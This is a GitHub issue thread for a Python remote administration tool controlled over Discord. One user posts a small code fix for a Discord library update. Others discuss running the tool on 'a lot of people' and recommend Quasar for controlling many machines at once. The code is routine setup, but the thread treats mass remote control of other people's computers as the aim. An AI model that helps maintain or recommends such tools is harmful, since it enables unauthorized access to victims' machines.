moom825 / Discord-RAT

Discord Remote Administration Tool fully written in Python3
240 stars 50 forks source link

How to fix the script #52

Open ege75753 opened 1 year ago

ege75753 commented 1 year ago

Ok hello so the script does not work because of a discord update so im gonna tell u how to make it work

so in line 31 "i dont know the line perfect but it should say 'client ='"

so change that to the following code

intents = discord.Intents.default() client = discord.Client(intents=intents) intents.message_content = True bot = commands.Bot(command_prefix='!', intents=intents)

thats it you fixed the program hooray!

THEKILERFRIEND commented 1 year ago

hey I got a question. is it bugging for you too when you have a lot of people? for me it is super buggy. image

ege75753 commented 1 year ago

@THEKILERFRIEND if you wanna use it for a lot of people i suggest you dont use this one because it can launch commands on every machine on 1 channel so its kind if broken i suggest you to use Quasar https://github.com/quasar/Quasar for actually using this on a lot of poeple because it is really buggy when there is more then 1 client